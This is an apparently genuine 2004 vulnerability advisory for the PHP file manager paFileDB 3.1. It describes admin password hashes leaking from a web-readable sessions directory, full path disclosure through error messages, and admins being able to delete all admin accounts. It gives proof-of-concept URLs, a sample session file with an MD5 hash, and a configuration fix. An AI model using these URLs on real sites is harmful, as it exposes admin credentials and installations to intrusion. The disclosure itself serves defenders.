ECHO_ADV_09$2004 

--------------------------------------------------------------------------- 
Multiple Vulnerabilities in paFileDB 3.1 
--------------------------------------------------------------------------- 

Author: y3dips 
Date: November, 26th 2004 
Location: Indonesia, Jakarta 
Web: http://echo.or.id/adv/adv09-y3dips-2004.txt 

--------------------------------------------------------------------------- 

Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

paFileDB 3.1 ( PHP ARENA ) Written by Todd ( todd@phparena.net ) 
web : http://www.phparena.net 

--------------------------------------------------------------------------- 

Vulnerabilities: 
~~~~~~~~~~~~~~~~ 

1. Possible to see Admin Hash Password if using sessions method 

If the site using sessions to handle the authentication in the site, Attacker 
could access the directory "sessions" and see the sessions in the same 
time when the admin log in to manage the site (which is include admin hash password) 


----- snip from manual page ----- 

In order to reduce compatibility problems, paFileDB 3.0 Final can use either 
sessions or cookies. Cookies are recommended and enabled by default, because 
there's less compatibility issues and unlike sessions, cookies don't require 
any data to be stored on the server. 

... 
To switch between sessions and cookies, open up pafiledb.php and look for 
the text: 

$authmethod = "cookies"; OR : 
$authmethod = "sessions"; 
... 

Before you make the switch to sessions, make a directory called "sessions" 
in your paFileDB folder (same folder as pafiledb.php) and CHMOD the directory 777. 

----- snip ------ 

POC 

Scenario : 

* admin (dudul) log in to manage the site at 
http://URL/pafiledb/pafiledb.php?action=admin ,then the session is recorded in 
sessions directory 

+ attacker access the directory directly and see the "sessions" (in a same time) 

Exploit: http://URL/pafiledb/sessions/[sessionfile] 

then access the listing sessions file 
example : 'sess_12c9d926184e836451a15ed837bb875d' 

which is contain 

user|s:5:"dudul";pass|s:32:"810f9f3fbad17446a22ed2e516a12c36"; 
ip|s:32:"f528764d624db129b32c21fbca0cb8d6"; 

---- info that attacker get ---- 

user : dudul 
pass : 810f9f3fbad17446a22ed2e516a12c36 <-- MD5 

---------------------------------------------------------------------------- 

2. Full path disclosure 

A remote user can access the file directly to cause the system to display 
an error message that indicates the installation path. The resulting error 
message will disclose potentially sensitive installation path information 
to the remote attacker. 

read my artikel about path disclosure with Indonesian language at 

http://ezine.echo.or.id/ezine8/ez-r08-y3dips-pathdisc.txt 


POC : 

http://URL/pafiledb/includes/admin/admins.php 

Fatal error: Call to undefined function: adlocbar() in 
/var/www/html/pafiledb/includes/admin/admins.php on line 13 

http://URL/pafiledb/includes/admin/category.php 

Fatal error: Call to undefined function: adlocbar() in 
/var/www/html/pafiledb/includes/admin/category.php on line 232 


http://URL/pafiledb/includes/team.php 

Warning: main(./includes/team/login.php): failed to open stream: 
No such file or directory in /var/www/html/pafiledb/includes/team.php on line 17 

Warning: main(): Failed opening './includes/team/login.php' for inclusion 
(include_path='.:/usr/share/pear') 
in /var/www/html/pafiledb/includes/team.php on line 17 

- - - - - - - - - - 
FIX it : 

For User and do not know how to fix the script , change php.ini file setting 
then turn on log_errors , and turn off display_error 

---------------------------------------------------------------------------- 

3. Possible to Have No Admin Account 

All admin have same power, so every admin could delete another admin until 
there is no admin left , if all admin acount deleted, so all admin could not log 
in to manage the site 

---------------------------------------------------------------------------- 

Shoutz: 
~~~~~~~ 

~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff 
~ newbie_hacker@yahoogroups.com , 
~ #e-c-h-o & #aikmel @DALNET 

--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 

y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id 
Homepage: http://y3dips.echo.or.id/ 

-------------------------------- [ EOF ] ---------------------------------